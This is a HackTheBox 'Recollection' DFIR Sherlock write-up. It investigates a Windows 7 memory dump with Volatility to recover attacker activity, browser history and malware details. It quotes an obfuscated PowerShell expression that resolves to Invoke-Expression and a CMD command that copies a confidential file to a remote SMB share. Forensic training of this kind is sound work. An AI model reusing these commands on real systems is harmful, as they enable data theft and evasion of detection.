Recollection
Recollection HackTheBox DFIR Sherlocks Writeup by Thamizhiniyan C S
Last updated
Recollection HackTheBox DFIR Sherlocks Writeup by Thamizhiniyan C S
Last updated
A junior member of our security team has been performing research and testing on what we believe to be an old and insecure operating system. We believe it may have been compromised & have managed to retrieve a memory dump of the asset. We want to confirm what actions were carried out by the attacker and if any other assets in our environment might be affected. Please answer the questions below.
First download the given file and extract it. I used the file command on the extracted file to identify its file type, but it didn't give anything interesting.
Next I used Volatility to check whether the given file is a memory dump.
You can install Volatility from the following repository:
Else you can use the REMnux Distro, which has Volatility preinstalled.
In my case, I am using the REMnux Distro.
To check whether the given file is a memory dump, you can use the imaginfo plugin from the Volatility framework.
From the output, we can see that the imageinfo command successfully exectued. Thus, the given file is a memory dump.
Note:
Volatility needs to know what type of system your memory dump came from, so it knows which data structures, algorithms, and symbols to use. You can supply the profile name using the--profile argument.
If you do not know what type of system the memory dump is from, use the imageinfo command to get suggested profiles from the Volatility Framework. Mostly the first suggestion from Volatlity will work fine.
What is the Operating System of the machine?
We can use the imageinfo plugin to get the OS details.
Answer: Windows 7
When was the memory dump created?
We can use the imageinfo plugin to get the creation date of the memory dump.
Answer: 2022-12-19 16:07:30
After the attacker gained access to the machine, the attacker copied an obfuscated PowerShell command to the clipboard. What was the command?
To get the contents of the clipboard from the memory dump, we can us the clipboard plugin.
Answer: (gv '*MDR*').naMe[3,11,2]-joIN''
The attacker copied the obfuscated command to use it as an alias for a PowerShell cmdlet. What is the cmdlet name?
So to know the cmdlet name, we have to find the output of the obfuscated powershell code. Since, the attacker has copied the command, the attacker might have executed it. So I extracted the command history from the memory file using the consoles plugin.
From the output, we can see that the attacker has executed the Powershell Command and the output of the command is 'iex'. I searched google about iex and got the cmdlet name.
Answer: Invoke-Expression
A CMD command was executed to attempt to exfiltrate a file. What is the full command line?
Again we can check the command history for the exfiltration attempt using the consoles plugin.
Answer:
type C:\Users\Public\Secret\Confidential.txt > \192.168.0.171\pulice\pass.txt
Following the above command, now tell us if the file was exfiltrated successfully?
Again we can get the output of the command that we found in the last task from the command history using the consoles plugin.
From the output we can see that the command was not executed successfully.
Answer: No
The attacker tried to create a readme file. What was the full path of the file?
You can find a Powershell command from the command history that we got using the consoles plugin, which contains a encoded string which looks like base64 encoded.
I used CyberChef to decode the base64 string.
From the output of CyberChef, we can see that the attacker has created a readme file at C:\Users\Public\Office\readme.txt, with the message "hacked by mafia". From this we infer that the attacker name is mafia.
Answer: C:\Users\Public\Office\readme.txt
What was the Host Name of the machine?
You can see that the attacker has executed the net users command to display user account information from the command history that we got using the consoles plugin, which contains the Host Name of the machine.
Answer: USER-PC
How many user accounts were in the machine?
You can see that the attacker has executed the net users command to display user account information from the command history that we got using the consoles plugin, which contains the users available in the machine.
In the "\Device\HarddiskVolume2\Users\user\AppData\Local\Microsoft\Edge" folder there were some sub-folders where there was a file named passwords.txt. What was the full file location/path?
Volatility can extract all the file objects that are stored in the memory using the filescan plugin. Since, the file name that we are looking out for is given in the question, I used grep to filter the results.
Answer:
\Device\HarddiskVolume2\Users\user\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData\3.0.0.0\passwords.txt
A malicious executable file was executed using command. The executable EXE file's name was the hash value of itself. What was the hash value?
You can find the output of the malicious executable file from the command history that we got using the consoles plugin, from which you can get the filename, which is also a hash.
Answer: b0ad704122d9cffddd57ec92991a1e99fc1ac02d5b4d8fd31720978c02635cb1
Following the previous question, what is the Imphash of the malicious file you found above?
I used the hash that we got in the last task in the VirusTotal's search feature, to get more details about that file.
From the results of VirusTotal, we can see that the file is a stealer. We can get the Imphash from the Details tab.
Answer: d3b592cd9481e4f053b5362e22d61595
Following the previous question, tell us the date in UTC format when the malicious file was created?
We can get the date from the VirusTotal Details section that we saw in the last task.
Answer: 2022-06-22 11:49:04
What was the local IP address of the machine?
You can use the netscan plugin of the Volatility framework to extract all the active connections and sockets.
From the ouput, we can see that the there is owner named system, which is the local IP address.
Answer: 192.168.0.104
There were multiple PowerShell processes, where one process was a child process. Which process was its parent process?
Use the pstree plugin to view the running processes in a tree view.
From the output, we can see that there are two Powershell instances of which, one has be spawned from the cmd.exe process, since the powershell.exe process with a Pid 3532 has the PPid as 4052, which is the Pid of the process cmd.exe.
Answer: cmd.exe
Attacker might have used an email address to login a social media. Can you tell us the email address?
First I extracted all the strings from the given memory dump using the strings command and put it in a file named Strings.txt.
With the help of python and regex, I extracted all the emails from the Strings.txt file.
You can the output of the above script below.
From all the emails that were extracted, mafia_code1337@gmail.com is the email of interest, since we know that the attackers name is mafia.
Answer: mafia_code1337@gmail.com
Using MS Edge browser, the victim searched about a SIEM solution. What is the SIEM solution's name?
First I checked whether MS Edge is running using the the pstree plugin to. Its running.
Since, its mentioned that the victim searched about a SIEM solution using MS Edge browser, I searched about where MS Edge browser stores its search histories and found this article: https://answers.microsoft.com/en-us/microsoftedge/forum/all/where-is-the-file-for-edge-history-stored/a6102594-d7ee-420d-afaa-77f2fc82b3ce, from which I came to know that Edge stores the history in the following path: C:\Users{user}\AppData\Local\Microsoft\Edge\User Data\Default\History.
The browser is still running, so we can extract the cached History file from the memory. For that we need the Address of this file in the memory. To get the memory address, I used the filescan plugin, with a filter using the grep command looking out for the path \AppData\Local\Microsoft\Edge\User Data\Default\History.
From the output of the previous command, we got the memory address. Now we can use the dumpfiles plugin to extract cached files from memory.
After extracting the files, I checked the file type of file.None.0xfffffa80056d1440.dat file using the file command.
From the output of the above command, we can see that the file is a SQLite database. So I used the following online SQLite Viewer to view the contents of the database.
From the output of the above SQLite Viewer, we can see the search terms table, which has the searches done in that browser. From the terms, we can see that the attacker has searched for the SIEM tool Wazuh.
Answer: Wazuh
The victim user downloaded an exe file. The file's name was mimicking a legitimate binary from Microsoft with a typo (i.e. legitimate binary is powershell.exe and attacker named a malware as powershall.exe). Tell us the file name with the file extension?
If we take a look at the command history from the memory file which we can extract using the consoles plugin, the victim has listed the Downloads directory which contains a file csrsss.exe.
There is windows system file named csrss.exe ( to know more about this file https://www.file.net/process/csrss.exe.html ), which the attacker used to name the malware.
Answer: csrsss.exe
Out of curiosity, I also tried dumping the csrsss.exe file that the victim downloaded to know more about it.
First I enumerated the memory address of the csrsss.exe file using the filescan plugin with a grep filter.
From the output, we can see that we have two addresses for the same file, both are same, so I dumped the first one using the dumpfile plugin.
Next, I checked the file type of the extracted file file.None.0xfffffa8003ac3220.dat using the file command.
The extracted file is Windows executable. Next I uploaded the file to VirusTotal to know more about it.
From the results of VirusTotal, we infer that the file that the victim downloaded is a trojan. You can find more details about the malware here: https://www.virustotal.com/gui/file/266da3c8353dbccc945217af3c7cd084a5352971953b978802d270450268fcb5
In this Sherlocks room, I learned about how to use Volatility Framework to enumerate memory dump files, specifically:
Looking out for running processes
Extracting MS Edge Browser history
Extracting Command History
Dumping Cached files from Memory
